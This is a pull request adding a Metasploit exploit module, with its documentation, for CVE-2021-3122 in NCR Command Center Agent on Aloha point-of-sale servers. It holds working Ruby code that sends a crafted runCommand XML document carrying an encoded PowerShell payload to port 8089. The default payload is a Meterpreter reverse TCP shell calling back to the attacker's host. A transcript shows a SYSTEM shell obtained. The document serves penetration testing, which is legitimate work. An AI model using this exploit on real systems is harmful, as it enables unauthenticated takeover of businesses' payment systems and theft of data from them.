### PR TITLE
Add NCR Command Center Agent Unauthenticated RCE (CVE-2021-3122)

### DIFF
--- a/documentation/modules/exploit/windows/misc/ncr_cmcagent_rce.md
+++ b/documentation/modules/exploit/windows/misc/ncr_cmcagent_rce.md
@@ -1,0 +1,55 @@
+## Vulnerable Application
+
+CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter
+(within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command
+as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only
+on devices with a certain "misconfiguration."
+
+Successfully tested against NCR Command Center Agent 16.2.1.1
+
+### Install
+
+The original link is https://rdf2.alohaenterprise.com/client/CMCInst.zip. Since the URL was inaccessible, the file was downloaded using the Web Archive. Here’s the final URL:
+
+```
+https://web.archive.org/web/20210129020048/https://rdf2.alohaenterprise.com/client/CMCInst.zip
+```
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use windows/misc/ncr_cmcagent_rce`
+4. Do: `set rhosts [ip]`
+5. Do: `set lhost [ip]`
+6. Do: `run`
+7. You should get a shell.
+
+## Options
+
+## Scenarios
+
+```
+msf > use windows/misc/ncr_cmcagent_rce
+[*] Using configured payload windows/meterpreter/reverse_tcp
+msf exploit(windows/misc/ncr_cmcagent_rce) > set LHOST 192.168.2.107
+LHOST => 192.168.2.107
+msf exploit(windows/misc/ncr_cmcagent_rce) > set RHOSTS 192.168.2.106
+RHOSTS => 192.168.2.106
+msf exploit(windows/misc/ncr_cmcagent_rce) > exploit
+[*] Started reverse TCP handler on 192.168.2.107:4444 
+[*] 192.168.2.106:8089 - Generating payload
+[*] 192.168.2.106:8089 - Check your shell
+[*] Sending stage (177734 bytes) to 192.168.2.106
+[*] Meterpreter session 1 opened (192.168.2.107:4444 -> 192.168.2.106:49849) at 2025-10-23 05:38:45 -0400
+
+meterpreter > shell
+Process 5188 created.
+Channel 1 created.
+Microsoft Windows [Version 10.0.19044.4529]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\Windows\system32>whoami
+whoami
+nt authority\system
+```

--- a/modules/exploits/windows/misc/ncr_cmcagent_rce.rb
+++ b/modules/exploits/windows/misc/ncr_cmcagent_rce.rb
@@ -1,0 +1,113 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'NCR Command Center Agent Remote Code Execution',
+        'Description' => %q{
+          CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter
+          (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command
+          as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only
+          on devices with a certain "misconfiguration."
+        },
+        'Author' => [
+          'daffainfo (Muhammad Daffa)',
+          'jjcho (Jericho Nathanael Chrisnanta)'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-3122'],
+          ['URL', 'https://www.tetradefense.com/incident-response-services/active-exploit-a-remote-code-execution-rce-vulnerability-for-ncr-aloha-point-of-sale/'],
+          ['URL', 'https://hcs-team.com/blog/cve-2021-3122/'],
+        ],
+        'DisclosureDate' => '2021-02-07',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_X64, ARCH_X86 ],
+        'Privileged' => true,
+        'Targets' => [
+            [
+              'Windows',
+              {
+                'Platform' => 'win',
+                'Arch' => [ ARCH_X64, ARCH_X86 ],
+                'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp'}
+              }
+          ]
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        },
+        'DefaultTarget'  => 0,
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(8089)
+      ]
+    )
+  end
+
+  def check
+    Exploit::CheckCode::Unknown
+  end
+
+  def generate_xml(cmd_payload)
+    xml_body = '<workitemroot commandname="runCommand">'
+    xml_body << '<WorkItem>'
+    xml_body << '<WorkItemId>1</WorkItemId>'
+    xml_body << '<CommandName>runCommand</CommandName>'
+    xml_body << '<SourceNode>0</SourceNode>'
+    xml_body << '<TargetNode>0</TargetNode>'
+    xml_body << '<Status>InProgress</Status>'
+    xml_body << '</WorkItem>'
+    xml_body << '<command>'
+    xml_body << '<Arguments>'
+
+    xml_body << cmd_payload
+
+    xml_body << '</Arguments>'
+    xml_body << '<Guid>00000000-0000-0000-0000-000000000001</Guid>'
+    xml_body << '<Result></Result>'
+    xml_body << '<destserver>WebServer</destserver>'
+    xml_body << '</command>'
+    xml_body << '</workitemroot>'
+    xml_body << '<:EOM:>'
+
+    xml_body
+  end
+
+  def exploit
+    begin
+      connect
+      print_status("Connected to #{rhost}:#{rport}") if datastore['VERBOSE']
+
+      cmd_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true)
+      payload_xml = generate_xml(cmd_payload)
+
+      print_status("Generating payload")
+
+      sock.put(payload_xml)
+
+      print_status("Check your shell")
+      handler
+
+    rescue ::Rex::ConnectionError => e
+      fail_with(Failure::Unreachable, "Failed to connect: #{e}")
+    ensure
+      disconnect
+    end
+  end
+end

--- a/modules/exploits/windows/misc/ncr_cmcagent_rce.rb
+++ b/modules/exploits/windows/misc/ncr_cmcagent_rce.rb
@@ -66,10 +66,10 @@ class MetasploitModule < Msf::Exploit::Remote
     banner = sock.get_once 
     disconnect 
     if (banner.to_s =~ /<cmcsys:myNodeNumber/) 
-      return Exploit::CheckCode::Detected 
+      return Exploit::CheckCode::Detected("CMCAgent detected")
     end 
     
-    return Exploit::CheckCode::Safe 
+    Exploit::CheckCode::Safe("Could not detect CMCAgent")
   end
 
   def generate_xml(cmd_payload)

--- a/modules/exploits/windows/misc/ncr_cmcagent_rce.rb
+++ b/modules/exploits/windows/misc/ncr_cmcagent_rce.rb
@@ -36,13 +36,13 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ ARCH_X64, ARCH_X86 ],
         'Privileged' => true,
         'Targets' => [
-            [
-              'Windows',
-              {
-                'Platform' => 'win',
-                'Arch' => [ ARCH_X64, ARCH_X86 ],
-                'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp'}
-              }
+          [
+            'Windows',
+            {
+              'Platform' => 'win',
+              'Arch' => [ ARCH_X64, ARCH_X86 ],
+              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
+            }
           ]
         ],
         'Notes' => {
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'Reliability' => [REPEATABLE_SESSION],
           'SideEffects' => []
         },
-        'DefaultTarget'  => 0,
+        'DefaultTarget' => 0
       )
     )
 
@@ -61,15 +61,15 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def check 
-    connect 
-    banner = sock.get_once 
-    disconnect 
-    if (banner.to_s =~ /<cmcsys:myNodeNumber/) 
-      return Exploit::CheckCode::Detected("CMCAgent detected")
-    end 
-    
-    Exploit::CheckCode::Safe("Could not detect CMCAgent")
+  def check
+    connect
+    banner = sock.get_once
+    disconnect
+    if (banner.to_s =~ /<cmcsys:myNodeNumber/)
+      return Exploit::CheckCode::Detected('CMCAgent detected')
+    end
+
+    Exploit::CheckCode::Safe('Could not detect CMCAgent')
   end
 
   def generate_xml(cmd_payload)
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
     exec_status = %w[Unknown Waiting InProgress].sample
     dest_server = %w[WebServer RdfServer].sample
     guid = SecureRandom.uuid
-    
+
     xml_body = '<workitemroot commandname="runCommand">'
     xml_body << '<WorkItem>'
     xml_body << '<WorkItemId>'
@@ -118,12 +118,11 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true)
     payload_xml = generate_xml(cmd_payload)
 
-    print_status("Generating payload")
+    print_status('Generating payload')
 
     sock.put(payload_xml)
 
-    print_status("Check your shell")
-
+    print_status('Check your shell')
   rescue ::Rex::ConnectionError => e
     fail_with(Failure::Unreachable, "Failed to connect: #{e}")
   ensure

--- a/modules/exploits/windows/misc/ncr_cmcagent_rce.rb
+++ b/modules/exploits/windows/misc/ncr_cmcagent_rce.rb
@@ -8,6 +8,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Powershell
+  prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
     super(
@@ -17,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter
           (within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command
-          as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only
+          as SYSTEM, as exploited in the wild in 2020 and/or 2021. The vendor's position is that exploitation occurs only
           on devices with a certain "misconfiguration."
         },
         'Author' => [
@@ -60,28 +61,49 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def check
-    Exploit::CheckCode::Unknown
+  def check 
+    connect 
+    banner = sock.get_once 
+    disconnect 
+    if (banner.to_s =~ /<cmcsys:myNodeNumber/) 
+      return Exploit::CheckCode::Detected 
+    end 
+    
+    return Exploit::CheckCode::Safe 
   end
 
   def generate_xml(cmd_payload)
+    workitem_id = rand(1..9)
+    source_node = rand(1..9)
+    exec_status = %w[Unknown Waiting InProgress].sample
+    dest_server = %w[WebServer RdfServer].sample
+    guid = SecureRandom.uuid
+    
     xml_body = '<workitemroot commandname="runCommand">'
     xml_body << '<WorkItem>'
-    xml_body << '<WorkItemId>1</WorkItemId>'
+    xml_body << '<WorkItemId>'
+    xml_body << workitem_id.to_s
+    xml_body << '</WorkItemId>'
     xml_body << '<CommandName>runCommand</CommandName>'
-    xml_body << '<SourceNode>0</SourceNode>'
+    xml_body << '<SourceNode>'
+    xml_body << source_node.to_s
+    xml_body << '</SourceNode>'
     xml_body << '<TargetNode>0</TargetNode>'
-    xml_body << '<Status>InProgress</Status>'
+    xml_body << '<Status>'
+    xml_body << exec_status
+    xml_body << '</Status>'
     xml_body << '</WorkItem>'
     xml_body << '<command>'
     xml_body << '<Arguments>'
-
     xml_body << cmd_payload
-
     xml_body << '</Arguments>'
-    xml_body << '<Guid>00000000-0000-0000-0000-000000000001</Guid>'
+    xml_body << '<Guid>'
+    xml_body << guid
+    xml_body << '</Guid>'
     xml_body << '<Result></Result>'
-    xml_body << '<destserver>WebServer</destserver>'
+    xml_body << '<destserver>'
+    xml_body << dest_server
+    xml_body << '</destserver>'
     xml_body << '</command>'
     xml_body << '</workitemroot>'
     xml_body << '<:EOM:>'
@@ -90,24 +112,21 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    begin
-      connect
-      print_status("Connected to #{rhost}:#{rport}") if datastore['VERBOSE']
+    connect
+    print_status("Connected to #{rhost}:#{rport}") if datastore['VERBOSE']
 
-      cmd_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true)
-      payload_xml = generate_xml(cmd_payload)
+    cmd_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, encode_final_payload: true)
+    payload_xml = generate_xml(cmd_payload)
 
-      print_status("Generating payload")
+    print_status("Generating payload")
 
-      sock.put(payload_xml)
+    sock.put(payload_xml)
 
-      print_status("Check your shell")
-      handler
+    print_status("Check your shell")
 
-    rescue ::Rex::ConnectionError => e
-      fail_with(Failure::Unreachable, "Failed to connect: #{e}")
-    ensure
-      disconnect
-    end
+  rescue ::Rex::ConnectionError => e
+    fail_with(Failure::Unreachable, "Failed to connect: #{e}")
+  ensure
+    disconnect
   end
 end


### PR DESCRIPTION
## Vulnerable Application

CMCAgent in NCR Command Center Agent 16.3 on Aloha POS/BOH servers permits the submission of a runCommand parameter
(within an XML document sent to port 8089) that enables the remote, unauthenticated execution of an arbitrary command
as SYSTEM, as exploited in the wild in 2020 and/or 2021. NOTE: the vendor's position is that exploitation occurs only
on devices with a certain "misconfiguration."

Successfully tested against NCR Command Center Agent 16.2.1.1

### Install

The original link is https://rdf2.alohaenterprise.com/client/CMCInst.zip. Since the URL was inaccessible, the file was downloaded using the Web Archive. Here’s the final URL:

```
https://web.archive.org/web/20210129020048/https://rdf2.alohaenterprise.com/client/CMCInst.zip
```

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use windows/misc/ncr_cmcagent_rce`
4. Do: `set rhosts [ip]`
5. Do: `run`
6. You should get a shell.

## Options

## Scenarios

```
msf > use windows/misc/ncr_cmcagent_rce
[*] Using configured payload windows/meterpreter/reverse_tcp
msf exploit(windows/misc/ncr_cmcagent_rce) > set LHOST 192.168.2.107
LHOST => 192.168.2.107
msf exploit(windows/misc/ncr_cmcagent_rce) > set RHOSTS 192.168.2.106
RHOSTS => 192.168.2.106
msf exploit(windows/misc/ncr_cmcagent_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.107:4444 
[*] 192.168.2.106:8089 - Generating payload
[*] 192.168.2.106:8089 - Check your shell
[*] Sending stage (177734 bytes) to 192.168.2.106
[*] Meterpreter session 1 opened (192.168.2.107:4444 -> 192.168.2.106:49849) at 2025-10-23 05:38:45 -0400

meterpreter > shell
Process 5188 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19044.4529]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
```